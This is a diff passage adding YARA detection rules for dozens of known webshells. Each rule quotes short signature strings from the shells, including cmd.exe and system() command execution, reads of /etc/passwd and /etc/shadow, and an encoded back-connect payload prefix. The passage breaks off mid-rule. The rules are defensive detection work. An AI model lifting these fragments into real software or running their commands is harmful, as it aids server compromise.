+}
+
+rule Webshell_WebShell_cgi_RID2F4E : DEMO T1100 WEBSHELL {
+   meta:
+      description = "Semi-Auto-generated - file WebShell.cgi.txt"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-03-29 11:51:31"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "WebShell.cgi" 
+      $s2 = "<td><code class=\"entry-[% if entry.all_rights %]mine[% else" 
+   condition: 
+      all of them
+}
+
+rule Webshell_WinX_Shell_html_RID3097 : DEMO SCRIPT T1100 WEBSHELL {
+   meta:
+      description = "Semi-Auto-generated - file WinX Shell.html.txt"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-03-29 12:46:21"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, SCRIPT, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "WinX Shell" 
+      $s1 = "Created by greenwood from n57" 
+      $s2 = "<td><font color=\\\"#990000\\\">Win Dir:</font></td>" 
+   condition: 
+      2 of them
+}
+
+rule Webshell_csh_php_php_RID2F32 : DEMO T1100 WEBSHELL {
+   meta:
+      description = "Semi-Auto-generated - file csh.php.php.txt"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-03-29 11:46:51"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = ".::[c0derz]::. web-shell" 
+      $s1 = "http://c0derz.org.ua" 
+      $s2 = "vint21h@c0derz.org.ua" 
+      $s3 = "$name='63a9f0ea7bb98050796b649e85481845';//root" 
+   condition: 
+      1 of them
+}
+
+rule Webshell_pHpINJ_php_php_RID2FFD : DEMO T1100 WEBSHELL {
+   meta:
+      description = "Semi-Auto-generated - file pHpINJ.php.php.txt"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-03-29 12:20:41"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "News Remote PHP Shell Injection" 
+      $s3 = "Php Shell <br />" fullword
+      $s4 = "<input type = \"text\" name = \"url\" value = \"" 
+   condition: 
+      2 of them
+}
+
+rule Webshell_sig_2008_php_php_RID3060 : DEMO T1100 WEBSHELL {
+   meta:
+      description = "Semi-Auto-generated - file 2008.php.php.txt"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-03-29 12:37:11"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "Codz by angel(4ngel)" 
+      $s1 = "Web: http://www.4ngel.net" 
+      $s2 = "$admin['cookielife'] = 86400;" 
+      $s3 = "$errmsg = 'The file you want Downloadable was nonexistent';" 
+   condition: 
+      1 of them
+}
+
+rule Webshell_ak74shell_php_php_RID3143 : DEMO T1100 WEBSHELL {
+   meta:
+      description = "Semi-Auto-generated - file ak74shell.php.php.txt"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-03-29 13:15:01"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "$res .= '<td align=\"center\"><a href=\"'.$xshell.'?act=chmod&file='.$_SESSION[" 
+      $s2 = "AK-74 Security Team Web Site: www.ak74-team.net" 
+      $s3 = "$xshell" 
+   condition: 
+      2 of them
+}
+
+rule Webshell_STNC_php_php_RID2F2C : DEMO T1100 WEBSHELL {
+   meta:
+      description = "Semi-Auto-generated - file STNC.php.php.txt"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-03-29 11:45:51"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "drmist.ru" fullword
+      $s1 = "hidden(\"action\",\"download\").hidden_pwd().\"<center><table><tr><td width=80" 
+      $s2 = "STNC WebShell" 
+      $s3 = "http://www.security-teams.net/index.php?showtopic=" 
+   condition: 
+      1 of them
+}
+
+rule Webshell_aZRaiLPhp_v1_0_php_RID312D : DEMO T1100 WEBSHELL {
+   meta:
+      description = "Semi-Auto-generated - file aZRaiLPhp v1.0.php.txt"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-03-29 13:11:21"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "azrailphp" 
+      $s1 = "<br><center><INPUT TYPE='SUBMIT' NAME='dy' VALUE='Dosya Yolla!'></center>" 
+      $s3 = "<center><INPUT TYPE='submit' name='okmf' value='TAMAM'></center>" 
+   condition: 
+      2 of them
+}
+
+rule Webshell_zacosmall_php_RID3013 : DEMO T1100 WEBSHELL {
+   meta:
+      description = "Semi-Auto-generated - file zacosmall.php.txt"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-03-29 12:24:21"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "rand(1,99999);$sj98" 
+      $s1 = "$dump_file.='`'.$rows2[0].'`" 
+      $s3 = "filename=\\\"dump_{$db_dump}_${table_d" 
+   condition: 
+      2 of them
+}
+
+rule Webshell_CmdAsp_asp_RID2E81 : DEMO T1100 WEBSHELL {
+   meta:
+      description = "Semi-Auto-generated - file CmdAsp.asp.txt"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-03-29 11:17:21"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "CmdAsp.asp" 
+      $s1 = "Set oFileSys = Server.CreateObject(\"Scripting.FileSystemObject\")" fullword
+      $s2 = "-- Use a poor man's pipe ... a temp file --" 
+      $s3 = "maceo @ dogmile.com" 
+   condition: 
+      2 of them
+}
+
+rule Webshell_mysql_shell_php_RID30FA : DEMO SCRIPT T1100 WEBSHELL {
+   meta:
+      description = "Semi-Auto-generated - file mysql_shell.php.txt"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-03-29 13:02:51"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, SCRIPT, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "SooMin Kim" 
+      $s1 = "smkim@popeye.snu.ac.kr" 
+      $s2 = "echo \"<td><a href='$PHP_SELF?action=deleteData&dbname=$dbname&tablename=$tablen" 
+   condition: 
+      1 of them
+}
+
+rule Webshell_backup_php_often_with_c99shell_RID36A5 : DEMO T1100 WEBSHELL {
+   meta:
+      description = "Semi-Auto-generated - file backup.php.php.txt"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-03-29 17:04:41"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "#phpMyAdmin MySQL-Dump" fullword
+      $s2 = ";db_connect();header('Content-Type: application/octetstr" 
+      $s4 = "$data .= \"#Database: $database" fullword
+   condition: 
+      all of them
+}
+
+rule Webshell_Reader_asp_RID2E9C : DEMO T1100 WEBSHELL {
+   meta:
+      description = "Semi-Auto-generated - file Reader.asp.txt"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-03-29 11:21:51"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "Mehdi & HolyDemon" 
+      $s2 = "www.infilak." 
+      $s3 = "'*T@*r@#@&mms^PdbYbVuBcAAA==^#~@%><form method=post name=inf><table width=\"75%" 
+   condition: 
+      2 of them
+}
+
+rule Webshell_jspshall_jsp_RID2FB3 : DEMO T1100 WEBSHELL {
+   meta:
+      description = "Semi-Auto-generated - file jspshall.jsp.txt"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-03-29 12:08:21"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "kj021320" 
+      $s1 = "case 'T':systemTools(out);break;" 
+      $s2 = "out.println(\"<tr><td>\"+ico(50)+f[i].getName()+\"</td><td> file" 
+   condition: 
+      2 of them
+}
+
+rule Webshell_Webshell_php_Blocker_RID32A4 : DEMO T1100 WEBSHELL {
+   meta:
+      description = "Semi-Auto-generated - file webshell.php.txt"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-03-29 14:13:51"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s2 = "<die(\"Couldn't Read directory, Blocked!!!\");" 
+      $s3 = "PHP Web Shell" 
+   condition: 
+      all of them
+}
+
+rule Webshell_shells_PHP_wso_RID3030 : DEMO T1100 WEBSHELL {
+   meta:
+      description = "Semi-Auto-generated - file wso.txt"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-03-29 12:29:11"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "$back_connect_p=\"IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbi" 
+      $s3 = "echo '<h1>Execution PHP-code</h1><div class=content><form name=pf method=pos" 
+   condition: 
+      1 of them
+}
+
+rule Webshell_backdoor1_php_RID2FC3 : DEMO T1100 WEBSHELL {
+   meta:
+      description = "Semi-Auto-generated - file backdoor1.php.txt"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-03-29 12:11:01"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "echo \"[DIR] <A HREF=\\\"\".$_SERVER['PHP_SELF'].\"?rep=\".realpath($rep.\".." 
+      $s2 = "class backdoor {" 
+      $s4 = "echo \"<a href=\\\"\".$_SERVER['PHP_SELF'].\"?copy=1\\\">Copier un fichier</a> <" 
+   condition: 
+      1 of them
+}
+
+rule Webshell_indexer_asp_RID2F38 : DEMO T1100 WEBSHELL {
+   meta:
+      description = "Semi-Auto-generated - file indexer.asp.txt"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-03-29 11:47:51"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "<td>Nereye :<td><input type=\"text\" name=\"nereye\" size=25></td><td><input typ" 
+      $s2 = "D7nD7l.km4snk`JzKnd{n_ejq;bd{KbPur#kQ8AAA==^#~@%>></td><td><input type=\"submit" 
+   condition: 
+      1 of them
+}
+
+rule Webshell_DxShell_php_php_RID30A8 : DEMO T1100 WEBSHELL {
+   meta:
+      description = "Semi-Auto-generated - file DxShell.php.php.txt"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-03-29 12:49:11"
+      score = 90
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "print \"\\n\".'Tip: to view the file \"as is\" - open the page in <a href=\"'.Dx" 
+      $s2 = "print \"\\n\".'<tr><td width=100pt class=linelisting><nobr>POST (php eval)</td><" 
+   condition: 
+      1 of them
+}
+
+rule Webshell_kacak_asp_RID2E44 : DEMO T1100 WEBSHELL {
+   meta:
+      description = "Semi-Auto-generated - file kacak.asp.txt"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-03-29 11:07:11"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "Kacak FSO 1.0" 
+      $s1 = "if request.querystring(\"TGH\") = \"1\" then" 
+      $s3 = "<font color=\"#858585\">BuqX</font></a></font><font face=\"Verdana\" style=" 
+      $s4 = "mailto:BuqX@hotmail.com" 
+   condition: 
+      1 of them
+}
+
+rule Webshell_PHP_Backdoor_Connect_pl_php_RID351D : DEMO MAL T1100 WEBSHELL {
+   meta:
+      description = "Semi-Auto-generated - file PHP Backdoor Connect.pl.php.txt"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-03-29 15:59:21"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, MAL, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "LorD of IRAN HACKERS SABOTAGE" 
+      $s1 = "LorD-C0d3r-NT" 
+      $s2 = "echo --==Userinfo==-- ;" 
+   condition: 
+      1 of them
+}
+
+rule Webshell_Antichat_Shell_v1_3_php_RID3368 : DEMO SCRIPT T1100 WEBSHELL {
+   meta:
+      description = "Semi-Auto-generated - file Antichat Shell v1.3.php.txt"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-03-29 14:46:31"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, SCRIPT, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "Antichat" 
+      $s1 = "Can't open file, permission denide" 
+      $s2 = "$ra44" 
+   condition: 
+      2 of them
+}
+
+rule Webshell_cmd_asp_5_1_asp_RID3044 : DEMO T1100 WEBSHELL {
+   meta:
+      description = "Semi-Auto-generated - file cmd-asp-5.1.asp.txt"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-03-29 12:32:31"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "Call oS.Run(\"win.com cmd.exe /c del \"& szTF,0,True)" fullword
+      $s3 = "Call oS.Run(\"win.com cmd.exe /c \"\"\" & szCMD & \" > \" & szTF &" fullword
+   condition: 
+      1 of them
+}
+
+rule Webshell_EFSO_2_asp_RID2E07 : DEMO T1100 WEBSHELL {
+   meta:
+      description = "Semi-Auto-generated - file EFSO_2.asp.txt"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-03-29 10:57:01"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "Ejder was HERE" 
+      $s1 = "*~PU*&BP[_)f!8c2F*@#@&~,P~P,~P&q~8BPmS~9~~lB~X`V,_,F&*~,jcW~~[_c3TRFFzq@#@&PP,~~" 
+   condition: 
+      2 of them
+}
+
+rule Webshell_lamashell_php_RID3000 : DEMO T1100 WEBSHELL {
+   meta:
+      description = "Semi-Auto-generated - file lamashell.php.txt"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-03-29 12:21:11"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "lama's'hell" fullword
+      $s1 = "if($_POST['king'] == \"\") {" 
+      $s2 = "if (move_uploaded_file($_FILES['fila']['tmp_name'], $curdir.\"/\".$_FILES['f" 
+   condition: 
+      1 of them
+}
+
+rule Webshell_Sincap_php_php_RID3052 : DEMO T1100 WEBSHELL {
+   meta:
+      description = "Semi-Auto-generated - file Sincap.php.php.txt"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-03-29 12:34:51"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "$baglan=fopen(\"/tmp/$ekinci\",'r');" 
+      $s2 = "$tampon4=$tampon3-1" 
+      $s3 = "@aventgrup.net" 
+   condition: 
+      2 of them
+}
+
+rule Webshell_Test_php_php_RID2F94 : DEMO T1100 WEBSHELL {
+   meta:
+      description = "Semi-Auto-generated - file Test.php.php.txt"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-03-29 12:03:11"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "$yazi = \"test\" . \"\\r\\n\";" fullword
+      $s2 = "fwrite ($fp, \"$yazi\");" fullword
+      $s3 = "$entry_line=\"HACKed by EntriKa\";" fullword
+   condition: 
+      1 of them
+}
+
+rule Webshell_Zehir_4_asp_RID2EDE : DEMO T1100 WEBSHELL {
+   meta:
+      description = "Semi-Auto-generated - file Zehir 4.asp.txt"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-03-29 11:32:51"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s2 = "</a><a href='\"&dosyapath&\"?status=10&dPath=\"&f1.path&\"&path=\"&path&\"&Time=" 
+      $s4 = "<input type=submit value=\"Test Et!\" onclick=\"" 
+   condition: 
+      1 of them
+}
+
+rule Webshell_sh_php_php_RID2ECF : DEMO SCRIPT T1087 T1100 WEBSHELL {
+   meta:
+      description = "Semi-Auto-generated - file sh.php.php.txt"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-03-29 11:30:21"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, SCRIPT, T1087, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "$ar_file=array('/etc/passwd','/etc/shadow','/etc/master.passwd','/etc/fstab','/e" 
+      $s2 = "Show <input type=text size=5 value=\".((isset($_POST['br_st']))?$_POST['br_st']:" 
+   condition: 
+      1 of them
+}
+
+rule Webshell_phpjackal_php_RID2FFB : DEMO T1100 WEBSHELL {
+   meta:
+      description = "Semi-Auto-generated - file phpjackal.php.txt"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-03-29 12:20:21"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s3 = "$dl=$_REQUEST['downloaD'];" 
+      $s4 = "else shelL(\"perl.exe $name $port\");" 
+   condition: 
+      1 of them
+}
+
+rule Webshell_sql_php_php_RID2F44 : DEMO T1100 WEBSHELL {
+   meta:
+      description = "Semi-Auto-generated - file sql.php.php.txt"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-03-29 11:49:51"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "fputs ($fp, \"# RST MySQL tools\\r\\n# Home page: http://rst.void.ru\\r\\n#" 
+      $s2 = "http://rst.void.ru" 
+      $s3 = "print \"<a href=\\\"$_SERVER[PHP_SELF]?s=$s&login=$login&passwd=$passwd&" 
+   condition: 
+      1 of them
+}
+
+rule Webshell_telnetd_pl_RID2ED1 : DEMO T1100 WEBSHELL {
+   meta:
+      description = "Semi-Auto-generated - file telnetd.pl.txt"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-03-29 11:30:41"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "0ldW0lf" fullword
+      $s1 = "However you are lucky :P" 
+      $s2 = "I'm FuCKeD" 
+      $s3 = "ioctl($CLIENT{$client}->{shell}, &TIOCSWINSZ, $winsize);#" 
+      $s4 = "atrix@irc.brasnet.org" 
+   condition: 
+      1 of them
+}
+
+rule Webshell_telnet_cgi_RID2EC4 : DEMO T1100 WEBSHELL {
+   meta:
+      description = "Semi-Auto-generated - file telnet.cgi.txt"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-03-29 11:28:31"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "W A R N I N G: Private Server" 
+      $s2 = "print \"Set-Cookie: SAVEDPWD=;\\n\"; # remove password cookie" 
+      $s3 = "$Prompt = $WinNT ? \"$CurrentDir> \" : \"[admin\\@$ServerName $C" 
+   condition: 
+      1 of them
+}
+
+rule Webshell_ironshell_php_RID301D : DEMO T1100 WEBSHELL {
+   meta:
+      description = "Semi-Auto-generated - file ironshell.php.txt"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-03-29 12:26:01"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "www.ironwarez.info" 
+      $s1 = "$cookiename = \"wieeeee\";" 
+      $s2 = "~ Shell I" 
+      $s3 = "www.rootshell-team.info" 
+      $s4 = "setcookie($cookiename, $_POST['pass'], time()+3600);" 
+   condition: 
+      1 of them
+}
+
+rule Webshell_backdoorfr_php_RID306A : DEMO T1100 WEBSHELL {
+   meta:
+      description = "Semi-Auto-generated - file backdoorfr.php.txt"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-03-29 12:38:51"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "www.victime.com/index.php?page=http://emplacement_de_la_backdoor.php , ou en tan" 
+      $s2 = "print(\"<br>Provenance du mail : <input type=\\\"text\\\" name=\\\"provenanc" 
+   condition: 
+      1 of them
+}
+
+rule Webshell_aspydrv_asp_RID2F52 : DEMO T1100 WEBSHELL {
+   meta:
+      description = "Semi-Auto-generated - file aspydrv.asp.txt"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-03-29 11:52:11"
+      score = 60
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "If mcolFormElem.Exists(LCase(sIndex)) Then Form = mcolFormElem.Item(LCase(sIndex))" 
+      $s1 = "password" 
+      $s2 = "session(\"shagman\")=" 
+   condition: 
+      2 of them
+}
+
+rule Webshell_cmdjsp_jsp_RID2ED3 : DEMO T1100 WEBSHELL {
+   meta:
+      description = "Semi-Auto-generated - file cmdjsp.jsp.txt"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-03-29 11:31:01"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "// note that linux = cmd and windows = \"cmd.exe /c + cmd\" " fullword
+      $s1 = "Process p = Runtime.getRuntime().exec(\"cmd.exe /C \" + cmd);" fullword
+      $s2 = "cmdjsp.jsp" 
+      $s3 = "michaeldaw.org" fullword
+   condition: 
+      2 of them
+}
+
+rule Webshell_h4ntu_shell__powered_by_tsoi__RID367B : DEMO SCRIPT T1100 WEBSHELL {
+   meta:
+      description = "Semi-Auto-generated - file h4ntu shell [powered by tsoi].txt"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-03-29 16:57:41"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, SCRIPT, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "h4ntu shell" 
+      $s1 = "system(\"$cmd 1> /tmp/cmdtemp 2>&1; cat /tmp/cmdtemp; rm /tmp/cmdtemp\");" 
+   condition: 
+      1 of them
+}
+
+rule Webshell_Ajan_asp_RID2DC3 : DEMO T1100 WEBSHELL {
+   meta:
+      description = "Semi-Auto-generated - file Ajan.asp.txt"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-03-29 10:45:41"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "c:\\downloaded.zip" 
+      $s2 = "Set entrika = entrika.CreateTextFile(\"c:\\net.vbs\", True)" fullword
+      $s3 = "http://www35.websamba.com/cybervurgun/" 
+   condition: 
+      1 of them
+}
+
+rule Webshell_PHANTASMA_php_RID2EEA : DEMO T1100 WEBSHELL {
+   meta:
+      description = "Semi-Auto-generated - file PHANTASMA.php.txt"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-03-29 11:34:51"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = ">[*] Safemode Mode Run</DIV>" 
+      $s1 = "$file1 - $file2 - <a href=$SCRIPT_NAME?$QUERY_STRING&see=$file>$file</a><br>" 
+      $s2 = "[*] Spawning Shell" 
+      $s3 = "Cha0s" 
+   condition: 
+      2 of them
+}
+
+rule Webshell_Liz0ziM_Private_Safe_Mode_Command_Execuriton_Bypass_Exploit_php_RID4390 : DEMO EXPLOIT T1100 WEBSHELL {
+   meta:
+      description = "Semi-Auto-generated - file Liz0ziM Private Safe Mode Command Execuriton Bypass Exploit.php.txt"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-03-29 02:15:51"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, EXPLOIT, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "<option value=\"cat /var/cpanel/accounting.log\">/var/cpanel/accounting.log</opt" 
+      $s1 = "Liz0ziM Private Safe Mode Command Execuriton Bypass" 
+      $s2 = "echo \"<b><font color=red>Kimim Ben :=)</font></b>:$uid<br>\";" fullword
+   condition: 
+      1 of them
+}
+
+rule Webshell_Nshell__1__php_php_RID31A8 : DEMO T1033 T1100 WEBSHELL {
+   meta:
+      description = "Semi-Auto-generated - file Nshell (1).php.php.txt"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-03-29 13:31:51"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, T1033, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "echo \"Command : <INPUT TYPE=text NAME=cmd value=\".@stripslashes(htmlentities($" 
+      $s1 = "if(!$whoami)$whoami=exec(\"whoami\"); echo \"whoami :\".$whoami.\"<br>\";" fullword
+   condition: 
+      1 of them
+}
+
+rule Webshell_shankar_php_php_RID30DC : DEMO T1100 WEBSHELL {
+   meta:
+      description = "Semi-Auto-generated - file shankar.php.php.txt"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-03-29 12:57:51"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      modified = "2022-02-17"
+      tags = "DEMO, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $Author = "ShAnKaR" 
+      $s0 = "<input type=checkbox name='dd' \".(isset($_POST['dd'])?'checked':'').\">DB<input" 
